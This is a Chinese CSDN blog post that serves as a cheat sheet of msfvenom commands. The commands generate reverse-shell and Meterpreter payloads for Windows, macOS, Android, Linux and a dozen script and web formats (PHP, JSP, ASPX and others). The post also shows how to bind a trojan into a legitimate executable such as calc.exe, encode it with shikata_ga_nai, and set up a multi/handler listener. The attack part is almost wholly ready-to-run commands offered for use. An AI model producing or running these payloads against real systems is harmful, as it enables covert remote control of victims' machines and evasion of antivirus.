Msfvenom

最新推荐文章于 2024-08-05 17:47:43 发布
最新推荐文章于 2024-08-05 17:47:43 发布
阅读量1.5k 收藏 5
点赞数 2
分类专栏: 备忘 文章标签: Msfvenom
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yajunserver/article/details/89024393
版权

windows:

c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe

c:\metasploit>msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe

c:\metasploit>msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -i 3 -f exe > c:\2.exe

 

捆绑木马:

捆绑木马还是使用上面提到的msfvenom命令,只不过我们要用到一个新的命令选项 -x:

-x 选项允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。

c:\metasploit>msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -i 3 -x C:\Windows\System32\calc.exe -f exe > c:\3cmd.exe

 

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayload.exe

mac:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f macho -o payload.macho

android:

//需要签名

msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell:

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >>shell.php

aspx:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -opayload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -opayload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -opayload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -opayload.lua

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c

 

Handlers:

use exploit/multi/handler
set LHOST 10.10.10.199
set LPORT 3080
set PAYLOAD windows/meterpreter/reverse_tcp
run

EncodingH
关注
专栏目录
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行文件。 前提条件: 1.Linux环境。 2.安装了METASPLOIT框架。 如果您在Kali Linux上运行它会更好。 安装说明 : 下载程序并提供可执行的permision,然后使用./PayloadCreator.pl运行,或者在没有givin permision的情况下运行perl PayloadCreator.pl *忽略info.pl
msfvenom常用参数
m0_61506558的博客
08-29 1592
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
简单的免杀方法(基本知识)
最新发布
2301_77472496的博客
08-05 1003
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后。
msfvenom
煮酒闲谈
09-22 4302
摘要在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。msfvenom:>>> msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfp
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1696
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom Payload 生成命令详解 MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 Payload, Payload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac...
第三十课:解决msfvenom命令自动补全.docx
09-15
解决msfvenom命令自动补全 在这篇文章中,我们将学习如何解决msfvenom命令的自动补全问题。在 Metasploit Framework 项目中,msfvenom 是一个功能强大且灵活的 payload 生成工具,但是它的参数非常繁琐,这使得使用...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
`msfvenom`是Metasploit框架的一部分,是一个强大的工具,可以生成各种类型的恶意软件payload,用于渗透测试。以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建...
msfvenom-backdoor-android:Android后门应用程序,msfvenom android .apk的改进源代码-Android app source code
03-24
msfvenom-backdoor-android 此Android Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透...
msfvenom java_Msfvenom 参数实例
weixin_30996983的博客
02-28 188
参数说明:–p(- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!(- -payload-options 列出payload选项)–l查看所有payload encoder nops。–f(- -help-...
Msfvenonm生成后门
weixin_44110913的博客
08-02 2113
目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Ms...
Msfvenom的使用
Beret-81的博客
03-12 1146
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
msfvenom介绍
weixin_46483815的博客
05-11 2269
主要介绍msfvenom 和一些实验
msfvenom java_msfvenom
weixin_32463071的博客
02-28 246
因为比赛需要,自学了一下msfvenom,可能会断断续续或者不完整,仅作参考。在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线0x...
msfvenom简介
gRpc的博客
09-22 263
msfvenom
msfvenom简单命令
Programmer_huangtao的博客
06-16 707
msfvenom命令行选项如下: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块...
Msfvenom – Metasploit 生成 Payloads 备忘录
时光途径
04-29 534
msfvenom 选项: -p,–payload<payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l,–list[module_type]列出指定模块的所有可用资源.模块类型包括:payloads,encoders,nops,all ...
msfvenom 检测
10-04
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的恶意软件。由于其具有强大的功能和广泛的应用,攻击者可能会使用msfvenom来制作恶意软件,以进行网络攻击和渗透测试。 要检测msfvenom,我们可以采取以下措施: 1. 使用安全工具和防火墙:使用现代的安全工具和防火墙可以检测恶意软件的传输和活动。这些工具可以检查网络流量并发现msfvenom生成的恶意软件。 2. 文件扫描:使用杀毒软件和安全扫描工具扫描文件系统,以检测是否存在恶意软件。这些工具中的病毒库通常会包含msfvenom生成的不同类型的恶意代码的特征。 3. 恶意软件行为分析:通过监视系统的行为、进程和网络活动,可以检测到可能由msfvenom生成的恶意软件引起的异常行为。例如,不寻常的文件访问、网络连接或系统资源消耗的增加等。 4. 恶意软件特征分析:通过分析已知的msfvenom生成的恶意软件的特征,可以开发特征识别规则。这些规则可以用于检测到类似的恶意软件。 5. 反向工程:对已经发现的msfvenom生成的恶意软件进行反向工程,以了解其行为和工作原理。通过对恶意软件的逆向分析,可以获得更多的知识,帮助我们检测和防范类似的威胁。 6. 及时更新和管理系统和软件:定期更新操作系统和软件,包括杀毒软件和其他安全工具。这有助于修复已知漏洞,并增强系统的安全性,从而减少msfvenom恶意软件的风险。 综上所述,检测msfvenom恶意软件需要综合使用多种安全措施和工具,包括防火墙、杀毒软件、恶意软件行为分析和特征分析等。及时更新和管理系统和软件也是减少恶意软件风险的重要步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值